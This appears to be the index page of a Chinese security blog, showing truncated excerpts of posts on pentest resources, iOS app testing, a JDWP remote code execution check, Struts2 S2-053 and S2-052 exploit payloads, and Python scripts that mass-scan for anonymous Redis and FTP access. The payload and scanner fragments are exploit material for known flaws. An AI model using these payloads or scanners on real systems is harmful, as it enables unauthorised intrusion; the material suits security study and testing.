Mr.Tcsy

Mr.Tcsy

河北区域如需工地搬砖(安服)、请联系我。

【工具贴】网络安全从业人员工具集
入门指南: https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 中文版 https://wizardforcel.gitbooks.io/asani/content/ 浅入浅出Android安全 中文版 https://wizardforcel.gitbooks.io/lpad/content/ Android 渗透测试学习手册 中文版 http...
IOS APP 测试标准
iOS APP渗透测试基准项 前期准备 说明 命令方法 手机越狱后配置cydia,安装好测试环境和软件 参照测试指南的步骤配置好iphone测试环境和wifi 获取后并安装ipa文件 使用iFunbox安装app 记录下测试的应用程序名称,版本等关键信息 运行snoop-it软件,查看软件名称版本等关键信息,并做记录 编译保护 开启PIE 查看是否启用了PIE内存随机分布功能 Otool –hV app 使用 ARC 如果采用 IOS 5+的 SDK 开发应用程序,则使用了该功能,否则未使用。 数据存储安全 本地数据存储 敏感文件一般存储在/var/m...
给渗透测试人员的优秀GitHub项目学习资源汇总
今天给大家带来的是一套优秀的GitHub项目学习资源(Awesome Hacking),无论你是小白还是渗透测试人员,无论你是白帽子亦或是黑帽黑客,你都可以从中学到很多新的东西。 五星推荐项目 GitHub项目 简介 Android Security 提供了一套与Android安全相关的资源 AppSec 提供了大量关于应用程序安全方面的学习资源 Bug Bounty 汇总了目前热门的漏洞奖励计划,并且还有很多Bug Hunter大神提供的Write-Up Cheatsheets 提供了渗透测试和安全检测可用的Cheatsheet CTF 提供了一套CTF框架、代码库...
Java Debug Remote Code Execution
1. 判断是否存在jdwp命令执行漏洞telnet端口后,输入命令JDWP-Handshake 如果返回JDWP-Handshake,证明存在漏洞。 并且,如果不快速输入,连接立马就会断掉。 ➜ ~ telnet 1.2.3.4 8000Trying 1.2.3.4…Connected to 1.2.3.4.Escape character is ‘^]’.JDWP-HandshakeJDWP-Handshake常用java debug端口号: 5005, 8000, 8080, 8181, 8453, 8787, 8788, 9001 注意:如果正在用下面的exp打的时候,exp正处...
s2-053 Exp
%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil...
s2-052 Payload
<map><entry><jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class=”com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data”> <dataHandler> <dataSource class=”com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource”> &l...
redis-scan-anonymous
#encoding=utf-8 import socket import redis import sys import re import argparse parser = argparse.ArgumentParser() parser.add_argument("-r",help="-r url.txt",type=str) #命令行参数 parser.add_argument("-t",help="待开发",type=int) #命令行参数 parser.add_argument("-p",help="待开发",type=int) #命令行参数 args = parser.p...
python---404 scan
代码贴上 不格式化 我也没办法233 @(便便)   密码 secsb 404 scan
python---批量扫描ftp anonymous
#!/usr/local/bin/python -- coding: utf-8 --批量扫描ftp匿名登录from ftplib import FTP def ftp_open(host=’’,user=’’,passwd=’’): #打开FTP try: ftp=FTP() data=ftp.login(user,passwd) #空字符串代表匿名登录 print () return 1 except: return 0 def ftp_test(): f = open(“url.txt”,”r”) lines=f.readlines() for ip in lines: if ft...